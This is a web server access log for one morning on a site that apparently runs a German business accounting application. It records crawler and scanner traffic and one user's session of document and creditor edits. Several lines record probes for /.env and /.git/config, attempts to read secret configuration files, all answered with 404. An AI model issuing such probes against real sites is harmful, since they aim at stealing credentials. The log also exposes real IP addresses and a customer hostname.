154.81.156.54 - - [16/Apr/2025:08:18:34 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.86.4 - - [16/Apr/2025:08:18:59 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.135.193.65 - - [16/Apr/2025:08:27:40 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 9; JSN-AL00a Build/HONORJSN-AL00a; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/1961 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN"
93.174.93.12 - - [16/Apr/2025:08:38:06 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
57.129.64.237 - - [16/Apr/2025:08:42:00 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
154.81.156.54 - - [16/Apr/2025:08:43:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [16/Apr/2025:08:55:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.175.134.70 - - [16/Apr/2025:08:56:02 +0200] "GET /activate/ HTTP/1.1" 404 354 "-" "Mozilla/5.0"
154.81.156.34 - - [16/Apr/2025:09:00:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.35 - - [16/Apr/2025:09:15:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [16/Apr/2025:09:21:39 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [16/Apr/2025:09:36:25 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.235.24.217 - - [16/Apr/2025:09:36:49 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.211.191.76 - - [16/Apr/2025:10:01:08 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Peach/1.01 (Ubuntu 8.04 LTS; U; en)"
47.128.58.24 - - [16/Apr/2025:10:05:10 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.97.58 - - [16/Apr/2025:10:05:20 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.113.4 - - [16/Apr/2025:10:07:56 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.56.32 - - [16/Apr/2025:10:08:05 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.54 - - [16/Apr/2025:10:12:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
85.90.4.30 - - [16/Apr/2025:10:13:44 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
154.81.156.54 - - [16/Apr/2025:10:20:45 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.34 - - [16/Apr/2025:10:26:17 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.249.70.141 - - [16/Apr/2025:10:27:47 +0200] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
154.81.156.35 - - [16/Apr/2025:10:34:02 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [16/Apr/2025:10:43:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.82.77.202 - - [16/Apr/2025:10:45:24 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
91.238.181.91 - - [16/Apr/2025:11:00:36 +0200] "\x03" 400 383 "-" "-"
154.81.156.54 - - [16/Apr/2025:11:14:21 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
77.119.167.53 - - [16/Apr/2025:11:15:11 +0200] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:15:11 +0200] "GET /entry.php?id=10273 HTTP/1.1" 200 1903 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:15:12 +0200] "GET /entry.php?id=10270 HTTP/1.1" 200 907 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:15:12 +0200] "GET /entry.php?id=10272 HTTP/1.1" 200 1158 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:15:12 +0200] "GET /entry.php?id=11412 HTTP/1.1" 200 1760 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:15:12 +0200] "GET /gui/javascript/form_form.js?1744794912 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:15:12 +0200] "GET /gui/javascript/form_form.js?1744794912 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:15:12 +0200] "GET /gui/javascript/form_form.js?1744794912 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:15:12 +0200] "GET /gui/javascript/form_form.js?1744794912 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:15:12 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 933 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:15:12 +0200] "GET /entry.php?id=10287 HTTP/1.1" 200 2396 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:15:12 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 907 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:15:12 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 1903 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:15:16 +0200] "POST /entry.php?id=10287& HTTP/1.1" 200 1968 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:19 +0200] "GET /gui/javascript/form_form.js?1744794979 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:19 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 2013 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:20 +0200] "GET /gui/javascript/form_form.js?1744794980 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:20 +0200] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:20 +0200] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2229 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:19 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:20 +0200] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:29 +0200] "GET /entry.php?id=10831 HTTP/1.1" 200 8821 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:29 +0200] "GET /gui/javascript/form_form.js?1744794989 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:29 +0200] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1508 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:34 +0200] "POST /entry.php?id=10831 HTTP/1.1" 200 8903 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:34 +0200] "GET /gui/javascript/form_form.js?1744794994 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:34 +0200] "GET /gui/images/icons/kalender.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:34 +0200] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1508 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:42 +0200] "GET /entry.php?id=10877&mode=loadSearchCustomer&obj=number&tag=kreditor&value=w&ser=1744789389332 HTTP/1.1" 200 292 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:42 +0200] "GET /entry.php?id=10877&mode=loadSearchCustomer&obj=number&tag=kreditor&value=we&ser=1744789389467 HTTP/1.1" 200 166 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:43 +0200] "GET /entry.php?id=10877&mode=loadSearchCustomer&obj=number&tag=kreditor&value=weg&ser=1744789390299 HTTP/1.1" 200 166 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:45 +0200] "POST /entry.php?id=10889 HTTP/1.1" 200 1766 "http://hausegger.activities.at/entry.php?id=10889&document_id=&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:16:45 +0200] "GET /gui/javascript/form_form.js?1744795005 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:17:20 +0200] "GET /entry.php?id=10271&&ser=794980 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:17:20 +0200] "GET /gui/javascript/form_form.js?1744795040 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=794980" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:18:20 +0200] "GET /entry.php?id=10271&&ser=795040 HTTP/1.1" 200 985 "http://hausegger.activities.at/entry.php?id=10271&&ser=794980" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:18:21 +0200] "GET /gui/javascript/form_form.js?1744795100 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=795040" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:21 +0200] "GET /entry.php?id=10271&&ser=795100 HTTP/1.1" 200 985 "http://hausegger.activities.at/entry.php?id=10271&&ser=795040" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:21 +0200] "GET /gui/javascript/form_form.js?1744795161 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=795100" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:28 +0200] "POST /entry.php?id=10831 HTTP/1.1" 200 8356 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:28 +0200] "GET /gui/javascript/form_form.js?1744795168 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:28 +0200] "GET /entry.php?id=10889&document_id=10349827& HTTP/1.1" 200 1508 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:29 +0200] "GET /gui/javascript/form_form.js?1744795169 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889&document_id=10349827&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:33 +0200] "POST /entry.php?id=10831 HTTP/1.1" 200 5725 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:33 +0200] "GET /gui/javascript/form_form.js?1744795173 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:33 +0200] "GET /entry.php?id=10889&document_id=10349827& HTTP/1.1" 200 1509 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:36 +0200] "POST /entry.php?id=10831 HTTP/1.1" 200 4667 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:36 +0200] "GET /gui/javascript/form_form.js?1744795176 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:37 +0200] "GET /entry.php?id=10830&&object=10349827&account=&mode=documentkreditor HTTP/1.1" 200 3137 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:37 +0200] "GET /gui/javascript/form_bu_job_processing_position.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10830&&object=10349827&account=&mode=documentkreditor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:37 +0200] "GET /gui/styles/DocumentPosition.css HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10830&&object=10349827&account=&mode=documentkreditor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:37 +0200] "GET /gui/javascript/form_form.js?1744795177 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10830&&object=10349827&account=&mode=documentkreditor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:37 +0200] "GET /entry.php?id=10889&document_id=10349827& HTTP/1.1" 200 1509 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:37 +0200] "GET /gui/images/icons/ajax_loading.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10830&&object=10349827&account=&mode=documentkreditor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:37 +0200] "GET /gui/images/icons/newrow.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10830&&object=10349827&account=&mode=documentkreditor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:39 +0200] "POST /entry.php?id=10889 HTTP/1.1" 200 1581 "http://hausegger.activities.at/entry.php?id=10889&document_id=10349827&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:39 +0200] "GET /gui/javascript/form_form.js?1744795179 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:46 +0200] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=kredit&refobject=10349827&value=1&ser=1744789572723 HTTP/1.1" 200 39294 "http://hausegger.activities.at/entry.php?id=10830&&object=10349827&account=&mode=documentkreditor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:46 +0200] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=kredit&refobject=10349827&value=18&ser=1744789572923 HTTP/1.1" 200 1285 "http://hausegger.activities.at/entry.php?id=10830&&object=10349827&account=&mode=documentkreditor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:46 +0200] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=kredit&refobject=10349827&value=184&ser=1744789573531 HTTP/1.1" 200 481 "http://hausegger.activities.at/entry.php?id=10830&&object=10349827&account=&mode=documentkreditor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:47 +0200] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=kredit&refobject=10349827&value=1841&ser=1744789573707 HTTP/1.1" 200 297 "http://hausegger.activities.at/entry.php?id=10830&&object=10349827&account=&mode=documentkreditor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:47 +0200] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=kredit&refobject=10349827&value=18416&ser=1744789573923 HTTP/1.1" 200 265 "http://hausegger.activities.at/entry.php?id=10830&&object=10349827&account=&mode=documentkreditor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:48 +0200] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=kredit&refobject=10349827&value=184167&ser=1744789574643 HTTP/1.1" 200 265 "http://hausegger.activities.at/entry.php?id=10830&&object=10349827&account=&mode=documentkreditor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:48 +0200] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=kredit&refobject=10349827&value=1841676&ser=1744789575044 HTTP/1.1" 200 265 "http://hausegger.activities.at/entry.php?id=10830&&object=10349827&account=&mode=documentkreditor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:48 +0200] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_1&tag=kredit&refobject=10349827&value=18416761&ser=1744789575267 HTTP/1.1" 200 265 "http://hausegger.activities.at/entry.php?id=10830&&object=10349827&account=&mode=documentkreditor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:53 +0200] "POST /entry.php?id=10889 HTTP/1.1" 200 1911 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:54 +0200] "GET /gui/javascript/form_form.js?1744795194 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:54 +0200] "POST /entry.php?id=10889 HTTP/1.1" 200 1671 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:58 +0200] "POST /entry.php?id=10889 HTTP/1.1" 200 1812 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:19:59 +0200] "GET /gui/javascript/form_form.js?1744795199 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:20:02 +0200] "GET /entry.php?id=11270&document=10349827 HTTP/1.1" 200 1975 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:20:02 +0200] "GET /gui/javascript/form_bu_document.js?1744795202 HTTP/1.1" 200 2675 "http://hausegger.activities.at/entry.php?id=11270&document=10349827" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:20:02 +0200] "GET /gui/javascript/form_form.js?1744795202 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11270&document=10349827" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:20:02 +0200] "GET /entry.php?id=11241&images=false&document=10349827 HTTP/1.1" 200 2270 "http://hausegger.activities.at/entry.php?id=11270&document=10349827" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.167.53 - - [16/Apr/2025:11:20:02 +0200] "GET /entry.php?id=10877&mode=observePrint HTTP/1.1" 200 58 "http://hausegger.activities.at/entry.php?id=11270&document=10349827" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
